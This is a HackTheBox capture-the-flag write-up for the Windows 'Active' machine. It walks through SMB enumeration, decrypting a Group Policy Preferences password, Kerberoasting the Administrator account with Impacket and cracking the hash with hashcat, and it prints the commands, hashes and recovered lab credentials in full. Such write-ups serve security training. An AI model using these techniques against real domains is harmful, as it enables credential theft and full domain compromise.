WriteupsHTB — Active
ADEasyWindows
HTB — Active
SMB anonymous access to SYSVOL leaks GPP-encrypted password. Kerberoasting the Administrator SPN cracks the hash for full domain access.
January 10, 2023HackTheBox
#AD#GPP#Kerberoasting#SMB
recon
shell
nmap -Pn -sV -p- -T4 10.10.10.100 -oA activeshell
Exploitation
smb
shell
enum4linux -a 10.10.10.100
[+] Attempting to map shares on 10.10.10.100
//10.10.10.100/ADMIN$ Mapping: DENIED Listing: N/A Writing: N/A
//10.10.10.100/C$ Mapping: DENIED Listing: N/A Writing: N/A
//10.10.10.100/IPC$ Mapping: OK Listing: DENIED Writing: N/A
//10.10.10.100/NETLOGON Mapping: DENIED Listing: N/A Writing: N/A
//10.10.10.100/Replication Mapping: OK Listing: OK Writing: N/A
//10.10.10.100/SYSVOL Mapping: DENIED Listing: N/A Writing: N/A
//10.10.10.100/Users Mapping: DENIED Listing: N/A Writing: N/A
[+] Got OS info for 10.10.10.100 from srvinfo:
10.10.10.100 Wk Sv PDC Tim NT Domain Controller
platform_id : 500
os version : 6.1
server type : 0x80102bshell
smbclient \\\\10.10.10.100\\Replicationshell
mv \{* ./Policiesshell
ls -lR
total 8
drwxr-xr-x 5 root root 4096 Aug 25 14:28 {31B2F340-016D-11D2-945F-00C04FB984F9}
drwxr-xr-x 4 root root 4096 Aug 25 14:28 {6AC1786C-016F-11D2-945F-00C04fB984F9}
./{31B2F340-016D-11D2-945F-00C04FB984F9}:
total 16
-rw-r--r-- 1 root root 23 Aug 25 14:28 GPT.INI
drwxr-xr-x 2 root root 4096 Aug 25 14:28 'Group Policy'
drwxr-xr-x 4 root root 4096 Aug 25 14:28 MACHINE
drwxr-xr-x 2 root root 4096 Aug 25 14:28 USER
'./{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy':
total 4
-rw-r--r-- 1 root root 119 Aug 25 14:28 GPE.INI
./{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE:
total 12
drwxr-xr-x 3 root root 4096 Aug 25 14:28 Microsoft
drwxr-xr-x 3 root root 4096 Aug 25 14:28 Preferences
-rw-r--r-- 1 root root 2788 Aug 25 14:28 Registry.pol
./{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft:
total 4
drwxr-xr-x 3 root root 4096 Aug 25 14:28 'Windows NT'
'./{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT':
total 4
drwxr-xr-x 2 root root 4096 Aug 25 14:28 SecEdit
'./{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit':
total 4
-rw-r--r-- 1 root root 1098 Aug 25 14:28 GptTmpl.inf
./{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences:
total 4
drwxr-xr-x 2 root root 4096 Aug 25 14:28 Groups
./{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups:
total 4
-rw-r--r-- 1 root root 533 Aug 25 14:28 Groups.xml
./{31B2F340-016D-11D2-945F-00C04FB984F9}/USER:
total 0
./{6AC1786C-016F-11D2-945F-00C04fB984F9}:
total 12
-rw-r--r-- 1 root root 22 Aug 25 14:28 GPT.INI
drwxr-xr-x 3 root root 4096 Aug 25 14:28 MACHINE
drwxr-xr-x 2 root root 4096 Aug 25 14:28 USER
./{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE:
total 4
drwxr-xr-x 3 root root 4096 Aug 25 14:28 Microsoft
./{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft:
total 4
drwxr-xr-x 3 root root 4096 Aug 25 14:28 'Windows NT'
'./{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT':
total 4
drwxr-xr-x 2 root root 4096 Aug 25 14:28 SecEdit
'./{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit':
total 4
-rw-r--r-- 1 root root 3722 Aug 25 14:28 GptTmpl.inf
./{6AC1786C-016F-11D2-945F-00C04fB984F9}/USER:
total 0shell
┌──(root㉿kali)-[/home/…/active/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy]
└─# cat GPE.INI
[General]
MachineExtensionVersions=[{17D89FEC-5C44-4972-B12D-241CAEF74509}{79F92669-4224-476C-9C5C-6EFB4D87DF4A}:10]
──(root㉿kali)-[/home/…/MACHINE/Microsoft/Windows NT/SecEdit]
└─# cat GptTmpl.inf
��[Unicode]
Unicode=yes
[System Access]
MinimumPasswordAge = 1
MaximumPasswordAge = 42
MinimumPasswordLength = 7
PasswordComplexity = 1
PasswordHistorySize = 24
LockoutBadCount = 0
RequireLogonToChangePassword = 0
ForceLogoffWhenHourExpire = 0
ClearTextPassword = 0
LSAAnonymousNameLookup = 0
[Kerberos Policy]
MaxTicketAge = 10
MaxRenewAge = 7
MaxServiceAge = 600
MaxClockSkew = 5
TicketValidateClient = 1
[Registry Values]
MACHINE\System\CurrentControlSet\Control\Lsa\NoLMHash=4,1
[Version]
signature="$CHICAGO$"
Revision=1
┌──(root㉿kali)-[/home/…/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups]
└─# cat Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>shell
┌──(root㉿kali)-[/home/…/active/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE]
└─# gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
GPPstillStandingStrong2k18code
samba-tool gpo load -UAdministrator --content=test.json
- can authenticate to smb with creds:
SVC_TGS:GPPstillStandingStrong2k18
shell
smbclient \\\\10.10.10.100\\Users -U SVC_TGS- try authenticate Admin smblicient and C$
Priv Esc
- get a list of
SPNson the target Windows domain from a Linux-based host.
shell
python3 /opt/windows/GetUserSPNs.py -dc-ip 10.10.10.100 active.htb/SVC_TGS -request
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2023-08-25 14:01:52.043775- download/request (
-request) all TGS tickets for offline processing from a Linux-based host.
shell
python3 /opt/windows/GetUserSPNs.py -dc-ip 10.10.10.100 active.htb/SVC_TGS -request
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2023-08-25 14:01:52.043775
[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$f27b0200...$02b2f18b38e860c17bbacc944bdfeaf28f7f315a576a34b43c22685d1e8b8c0c22951e651ca2757e75bdd5974e7bd5e70aaad21f0547c6b537105d859c2ebd54718bed15ac8636b105afac7ba717c4d197c40ea03e4081ad2984c11276caf6e97870c04d4da71505a8e41fd6200aed9bb9b874af78c7b67b77124c89fb50a0dbd6ca6aa4ad582ecc4f0473fc35e209cee0ec64395eed9aa97c12f3a563c73b7cf03d553b3a476d764151b57afbb2ed7f7bd19dbf6abc55acaa1f0997c867ba597fcc7304d61ed8d4adfd528e7e454a165f186d5fb138448e84b6a2a00ae188fe5870d5618c1a45c58caff4d3fc917e538770fb9319506ea11620b53e084ebf6b0c6dba8b39fe19c6b0883238d1e1f856dec6215ac5159d3804997317ad63ff7d1b0e6ac4239738a148764278e7787ae63b095fff5ac4987797eb7f6a24ef4d731237c396f8fc52ddc9e99f03c1c46b76c221cbbf6a9e3787e7fe8aa0770b696251219bbb0f81d5ab04821ab2a9fed1eee4ea4b157acedb62c2ef3acdafe2181648ecde389e8b6599ee87b6282eba9bf891bbe74005f1af08f5e1245c10ff20aeda8659b40be89e0720edd992bbee9102baa2f661064fc7c0f4115d11a5dcb8b9c28f83141cd9d009bb1830c7fd1c4d170e4ccc74729419f1f183febc4d4dafd1302f8fd6a92f595e3b4a2538d4eeb866a37586613aa85b4e7524331438fedca9a440c659cae424d8bb8d745a14e41c3b403cc35cc119683708c4bd302e3f16e21cfe094ec935539ffe66187d1722a1b178e586c53a5f1b050884afeef7d5dcfc086db0973873efd6506b8167ab26b94e62a6177c733f7c5497a0aa2360d7bca6b7f615e81b1a637f8283d91765ed8f9bfaaf32a2456f83c8a195266a82c0ff21cbda2720649dc9226dce653e70f83ff955b5696e1c885489f74d80d28b02c4ba4adb8d49ff4b7cac4f06ed5754ca117259597781aa7170dd96a0b673fcd973268b720c7b8ccb32fbdd31e6d5c1e5d2d7184d295ca0953fcc725a2cda5a458555062f1e911c1f0f96225f4bb8d9fdc54b407e7b6634e27a0e0814c7d1835a723d9d422b27b1091c96002483d19a2ebcaef80c518d87d598cb1f1fbc259c842f1877230fa68d407975792b79fa59fa090c3ac414b3e16bf99d3709b5b146b4a880d7343e6f4cbb2477cab72f54067e884a8fd54337be6799eb57e7110762fa883d07659087282f1f21bfb5a4a23d205ff1f34bdc8e333d722447cd- Attempts to crack the Kerberos
shell
hashcat -m 13100 ./administrator_tgs /usr/share/wordlists/rockyou.txt
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$f27b0200...$02b2f18b38e860c17bbacc944bdfeaf28f7f315a576a34b43c22685d1e8b8c0c22951e651ca2757e75bdd5974e7bd5e70aaad21f0547c6b537105d859c2ebd54718bed15ac8636b105afac7ba717c4d197c40ea03e4081ad2984c11276caf6e97870c04d4da71505a8e41fd6200aed9bb9b874af78c7b67b77124c89fb50a0dbd6ca6aa4ad582ecc4f0473fc35e209cee0ec64395eed9aa97c12f3a563c73b7cf03d553b3a476d764151b57afbb2ed7f7bd19dbf6abc55acaa1f0997c867ba597fcc7304d61ed8d4adfd528e7e454a165f186d5fb138448e84b6a2a00ae188fe5870d5618c1a45c58caff4d3fc917e538770fb9319506ea11620b53e084ebf6b0c6dba8b39fe19c6b0883238d1e1f856dec6215ac5159d3804997317ad63ff7d1b0e6ac4239738a148764278e7787ae63b095fff5ac4987797eb7f6a24ef4d731237c396f8fc52ddc9e99f03c1c46b76c221cbbf6a9e3787e7fe8aa0770b696251219bbb0f81d5ab04821ab2a9fed1eee4ea4b157acedb62c2ef3acdafe2181648ecde389e8b6599ee87b6282eba9bf891bbe74005f1af08f5e1245c10ff20aeda8659b40be89e0720edd992bbee9102baa2f661064fc7c0f4115d11a5dcb8b9c28f83141cd9d009bb1830c7fd1c4d170e4ccc74729419f1f183febc4d4dafd1302f8fd6a92f595e3b4a2538d4eeb866a37586613aa85b4e7524331438fedca9a440c659cae424d8bb8d745a14e41c3b403cc35cc119683708c4bd302e3f16e21cfe094ec935539ffe66187d1722a1b178e586c53a5f1b050884afeef7d5dcfc086db0973873efd6506b8167ab26b94e62a6177c733f7c5497a0aa2360d7bca6b7f615e81b1a637f8283d91765ed8f9bfaaf32a2456f83c8a195266a82c0ff21cbda2720649dc9226dce653e70f83ff955b5696e1c885489f74d80d28b02c4ba4adb8d49ff4b7cac4f06ed5754ca117259597781aa7170dd96a0b673fcd973268b720c7b8ccb32fbdd31e6d5c1e5d2d7184d295ca0953fcc725a2cda5a458555062f1e911c1f0f96225f4bb8d9fdc54b407e7b6634e27a0e0814c7d1835a723d9d422b27b1091c96002483d19a2ebcaef80c518d87d598cb1f1fbc259c842f1877230fa68d407975792b79fa59fa090c3ac414b3e16bf99d3709b5b146b4a880d7343e6f4cbb2477cab72f54067e884a8fd54337be6799eb57e7110762fa883d07659087282f1f21bfb5a4a23d205ff1f34bdc8e333d722447cd:Ticketmaster1968- creds for
Administrator:Ticketmaster1968
shell
smbclient \\\\10.10.10.100\\C$ -U Administrator
Password for [WORKGROUP\Administrator]:Ticketmaster1968
smb: \Users\Administrator\Desktop\> get root.txtshell
┌──(root㉿kali)-[/home/sake/htb-labs/active]
└─# cat root.txt
b6ac38e0...ans: b6ac38e0...
Up next
EasyNov 2024
HTB — Sau
Maltrail 0.53 SSRF on a request-basket service. CVE-2023-27163 chained to unauthenticated OS command injection for initial access, sudo privesc.
Read writeup
EasyNov 2024
HTB — Busqueda
Searchor 2.4.0 CLI eval() injection for code execution. Gitea instance found via Docker-compose, admin token for privileged script execution.
Read writeup
MediumNov 2024
HTB — UpDown
Site availability checker with .htaccess allowlist bypass. PHP phar deserialization for code execution, proc_open for shell, developer sudo suid binary.
Read writeup